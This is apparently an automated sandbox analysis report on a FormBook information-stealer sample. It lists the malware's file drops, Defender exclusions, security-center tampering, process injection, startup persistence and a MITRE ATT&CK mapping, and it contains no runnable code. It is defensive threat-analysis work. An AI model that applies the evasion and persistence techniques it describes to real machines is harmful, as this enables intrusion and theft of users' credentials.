                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\36C95A71.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\36C95A71.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\36C95A71.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\36C95A71.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Runtime.Remoting\v4.0_4.0.0.0__b77a5c561934e089\System.Runtime.Remoting.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\36C95A71.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
                Source: C:\Users\Public\Documents\2FDD6624\svchost.exeQueries volume information: C:\Users\Public\Documents\2FDD6624\svchost.exe VolumeInformation
                Source: C:\Users\Public\Documents\2FDD6624\svchost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                Source: C:\Users\Public\Documents\2FDD6624\svchost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                Source: C:\Users\Public\Documents\2FDD6624\svchost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                Source: C:\Users\Public\Documents\2FDD6624\svchost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                Source: C:\Users\Public\Documents\2FDD6624\svchost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Runtime.Remoting\v4.0_4.0.0.0__b77a5c561934e089\System.Runtime.Remoting.dll VolumeInformation
                Source: C:\Users\Public\Documents\2FDD6624\svchost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
                Source: C:\Users\Public\Documents\2FDD6624\svchost.exeQueries volume information: C:\Users\Public\Documents\2FDD6624\svchost.exe VolumeInformation
                Source: C:\Users\Public\Documents\2FDD6624\svchost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                Source: C:\Users\Public\Documents\2FDD6624\svchost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                Source: C:\Users\Public\Documents\2FDD6624\svchost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                Source: C:\Users\Public\Documents\2FDD6624\svchost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                Source: C:\Users\Public\Documents\2FDD6624\svchost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Runtime.Remoting\v4.0_4.0.0.0__b77a5c561934e089\System.Runtime.Remoting.dll VolumeInformation
                Source: C:\Users\Public\Documents\2FDD6624\svchost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                Source: C:\Users\user\Desktop\RYhdmjjr94.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                Source: C:\Users\user\AppData\Local\Temp\866838ff-f925-41f4-be86-0619ea100a91\AdvancedRun.exeCode function: 5_2_0040A272 WriteProcessMemory,GetVersionExW,CreateRemoteThread,

                Lowering of HIPS / PFW / Operating System Security Settings:

                barindex
                Changes security center settings (notifications, updates, antivirus, firewall)Show sources
                Source: C:\Windows\System32\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center cval
                Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecNotificationQuery - ROOT\SecurityCenter : SELECT * FROM __InstanceOperationEvent WHERE TargetInstance ISA &apos;AntiVirusProduct&apos; OR TargetInstance ISA &apos;FirewallProduct&apos; OR TargetInstance ISA &apos;AntiSpywareProduct&apos;
                Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : FirewallProduct
                Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : AntiVirusProduct
                Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : AntiSpywareProduct
                Source: svchost.exe, 0000001A.00000002.590444499.0000021F5D629000.00000004.00000001.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

                Stealing of Sensitive Information:

                barindex
                Yara detected FormBookShow sources
                Source: Yara matchFile source: 00000000.00000000.407421207.0000000003B13000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000025.00000000.601965893.00000000076C0000.00000040.00020000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000025.00000000.592270922.0000000006791000.00000040.00020000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000025.00000000.600871078.00000000073C2000.00000040.00020000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000000.504065337.0000000003AB3000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000025.00000000.595996658.0000000006CCA000.00000040.00020000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000025.00000000.599863307.0000000007292000.00000040.00020000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000000.507226392.0000000003B13000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000025.00000000.598338320.00000000070EE000.00000040.00020000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000000.407100125.0000000003AB3000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000025.00000000.601361941.00000000074C9000.00000040.00020000.sdmp, type: MEMORY

                Remote Access Functionality:

                barindex
                Yara detected FormBookShow sources
                Source: Yara matchFile source: 00000000.00000000.407421207.0000000003B13000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000025.00000000.601965893.00000000076C0000.00000040.00020000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000025.00000000.592270922.0000000006791000.00000040.00020000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000025.00000000.600871078.00000000073C2000.00000040.00020000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000000.504065337.0000000003AB3000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000025.00000000.595996658.0000000006CCA000.00000040.00020000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000025.00000000.599863307.0000000007292000.00000040.00020000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000000.507226392.0000000003B13000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000025.00000000.598338320.00000000070EE000.00000040.00020000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000000.407100125.0000000003AB3000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000025.00000000.601361941.00000000074C9000.00000040.00020000.sdmp, type: MEMORY

                Mitre Att&ck Matrix

                Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                Valid AccountsWindows Management Instrumentation12Startup Items1Startup Items1Disable or Modify Tools211OS Credential DumpingFile and Directory Discovery2Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumData ObfuscationEavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                Default AccountsNative API11DLL Side-Loading1Exploitation for Privilege Escalation1Deobfuscate/Decode Files or Information11LSASS MemorySystem Information Discovery133Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothJunk DataExploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                Domain AccountsCommand and Scripting Interpreter1Application Shimming1DLL Side-Loading1Obfuscated Files or Information2Security Account ManagerQuery Registry1SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationSteganographyExploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                Local AccountsService Execution2Windows Service1Application Shimming1DLL Side-Loading1NTDSSecurity Software Discovery461Distributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
                Cloud AccountsCronRegistry Run Keys / Startup Folder221Access Token Manipulation1Masquerading111LSA SecretsVirtualization/Sandbox Evasion161SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                Replication Through Removable MediaLaunchdRc.commonWindows Service1Virtualization/Sandbox Evasion161Cached Domain CredentialsProcess Discovery3VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                External Remote ServicesScheduled TaskStartup ItemsProcess Injection412Access Token Manipulation1DCSyncApplication Window Discovery1Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobRegistry Run Keys / Startup Folder221Process Injection412Proc FilesystemRemote System Discovery1Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 signatures2 2 Behavior Graph ID: 483549 Sample: RYhdmjjr94 Startdate: 15/09/2021 Architecture: WINDOWS Score: 100 89 Malicious sample detected (through community Yara rule) 2->89 91 Sigma detected: Powershell adding suspicious path to exclusion list 2->91 93 Multi AV Scanner detection for submitted file 2->93 95 12 other signatures 2->95 9 RYhdmjjr94.exe 9 11 2->9         started        13 svchost.exe 2->13         started        15 36C95A71.exe 2->15         started        17 9 other processes 2->17 process3 dnsIp4 73 C:\Users\user\AppData\...\36C95A71.exe, PE32 9->73 dropped 75 C:\Users\Public\Documents\...\svchost.exe, PE32 9->75 dropped 77 C:\Users\...\36C95A71.exe:Zone.Identifier, ASCII 9->77 dropped 83 2 other files (1 malicious) 9->83 dropped 105 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 9->105 107 Creates autostart registry keys with suspicious names 9->107 109 Drops PE files to the startup folder 9->109 117 4 other signatures 9->117 20 aspnet_compiler.exe 9->20         started        23 36C95A71.exe 9->23         started        26 WerFault.exe 9->26         started        34 9 other processes 9->34 79 C:\Users\user\AppData\...\AdvancedRun.exe, PE32 13->79 dropped 111 Multi AV Scanner detection for dropped file 13->111 113 Adds a directory exclusion to Windows Defender 13->113 28 AdvancedRun.exe 13->28         started        81 C:\Users\user\AppData\...\AdvancedRun.exe, PE32 15->81 dropped 30 AdvancedRun.exe 15->30         started        85 127.0.0.1 unknown unknown 17->85 115 Changes security center settings (notifications, updates, antivirus, firewall) 17->115 32 WerFault.exe 17->32         started        file5 signatures6 process7 dnsIp8 97 Maps a DLL or memory area into another process 20->97 99 Tries to detect virtualization through RDTSC time measurements 20->99 37 explorer.exe 20->37 injected 67 C:\Users\user\AppData\...\AdvancedRun.exe, PE32 23->67 dropped 101 Adds a directory exclusion to Windows Defender 23->101 39 AdvancedRun.exe 23->39         started        41 powershell.exe 23->41         started        43 powershell.exe 23->43         started        69 C:\ProgramData\Microsoft\...\Report.wer, Little-endian 26->69 dropped 45 AdvancedRun.exe 28->45         started        47 AdvancedRun.exe 30->47         started        87 192.168.2.1 unknown unknown 34->87 49 AdvancedRun.exe 34->49         started        51 conhost.exe 34->51         started        53 7 other processes 34->53 file9 signatures10 process11 process12 55 svchost.exe 37->55         started        59 AdvancedRun.exe 39->59         started        61 conhost.exe 41->61         started        63 conhost.exe 43->63         started        file13 71 C:\Users\user\AppData\...\AdvancedRun.exe, PE32 55->71 dropped 103 Adds a directory exclusion to Windows Defender 55->103 65 AdvancedRun.exe 55->65         started        signatures14 process15

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.

                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                RYhdmjjr94.exe46%VirustotalBrowse
                RYhdmjjr94.exe23%MetadefenderBrowse
                RYhdmjjr94.exe51%ReversingLabsWin32.Trojan.Sabsik

                Dropped Files

                SourceDetectionScannerLabelLink
                C:\Users\Public\Documents\2FDD6624\svchost.exe46%VirustotalBrowse
                C:\Users\Public\Documents\2FDD6624\svchost.exe23%MetadefenderBrowse
                C:\Users\Public\Documents\2FDD6624\svchost.exe51%ReversingLabsWin32.Trojan.Sabsik
                C:\Users\user\AppData\Local\Temp\36029300-7d61-41e1-9521-12c4a6ab3f8e\AdvancedRun.exe0%VirustotalBrowse
                C:\Users\user\AppData\Local\Temp\36029300-7d61-41e1-9521-12c4a6ab3f8e\AdvancedRun.exe3%MetadefenderBrowse
                C:\Users\user\AppData\Local\Temp\36029300-7d61-41e1-9521-12c4a6ab3f8e\AdvancedRun.exe0%ReversingLabs
                C:\Users\user\AppData\Local\Temp\4a22a6d0-4aef-43ec-af0a-4fbe1184937f\AdvancedRun.exe0%VirustotalBrowse
                C:\Users\user\AppData\Local\Temp\4a22a6d0-4aef-43ec-af0a-4fbe1184937f\AdvancedRun.exe3%MetadefenderBrowse
                C:\Users\user\AppData\Local\Temp\4a22a6d0-4aef-43ec-af0a-4fbe1184937f\AdvancedRun.exe0%ReversingLabs

                Unpacked PE Files

                No Antivirus matches

                Domains

                No Antivirus matches

                URLs

                SourceDetectionScannerLabelLink
                http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl00%URL Reputationsafe
                http://ocsp.sectigo.com00%URL Reputationsafe
                http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#0%URL Reputationsafe
                http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#0%URL Reputationsafe
                https://sectigo.com/CPS0C0%URL Reputationsafe
                https://sectigo.com/CPS0D0%URL Reputationsafe
                http://www.bingmapsportal.comsv0%URL Reputationsafe
                https://sectigo.com/CPS00%URL Reputationsafe
                http://crt.sectigo.com/SectigoPublicCodeSigningCAR36.crt0#0%URL Reputationsafe
                http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s0%URL Reputationsafe
                https://%s.xboxlive.com0%URL Reputationsafe
                http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t0%URL Reputationsafe
                http://crl.sectigo.com/SectigoPublicCodeSigningCAR36.crl0y0%URL Reputationsafe
                https://dynamic.t0%URL Reputationsafe
                http://crl.sectigo.com/SectigoPub0%Avira URL Cloudsafe
                http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#0%URL Reputationsafe
                https://%s.dnet.xboxlive.com0%URL Reputationsafe

                Domains and IPs

                Contacted Domains

                No contacted domains info

                URLs from Memory and Binaries

                NameSourceMaliciousAntivirus DetectionReputation
                http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0RYhdmjjr94.exe, 00000000.00000003.330692713.00000000064DA000.00000004.00000001.sdmpfalse
                • URL Reputation: safe
                		unknown
                http://ocsp.sectigo.com0RYhdmjjr94.exe, 00000000.00000000.494947483.00000000039F0000.00000004.00000001.sdmp, RYhdmjjr94.exe, 00000000.00000003.330692713.00000000064DA000.00000004.00000001.sdmpfalse
                • URL Reputation: safe
                		unknown
                https://dev.ditu.live.com/REST/v1/Routes/svchost.exe, 00000010.00000002.331451640.00000188CA23D000.00000004.00000001.sdmpfalse
                  		high
                  https://dev.virtualearth.net/REST/v1/Routes/Drivingsvchost.exe, 00000010.00000003.324967731.00000188CA262000.00000004.00000001.sdmpfalse
                    		high
                    https://t0.ssl.ak.dynamic.tiles.virtualearth.net/comp/gen.ashxsvchost.exe, 00000010.00000002.331451640.00000188CA23D000.00000004.00000001.sdmpfalse
                      		high
                      https://dev.ditu.live.com/REST/v1/Traffic/Incidents/svchost.exe, 00000010.00000002.331472512.00000188CA24B000.00000004.00000001.sdmpfalse
                        		high
                        https://t0.tiles.ditu.live.com/tiles/gensvchost.exe, 00000010.00000002.331248792.00000188CA213000.00000004.00000001.sdmpfalse
                          		high
                          https://dev.virtualearth.net/REST/v1/Routes/Walkingsvchost.exe, 00000010.00000003.324967731.00000188CA262000.00000004.00000001.sdmpfalse
                            		high
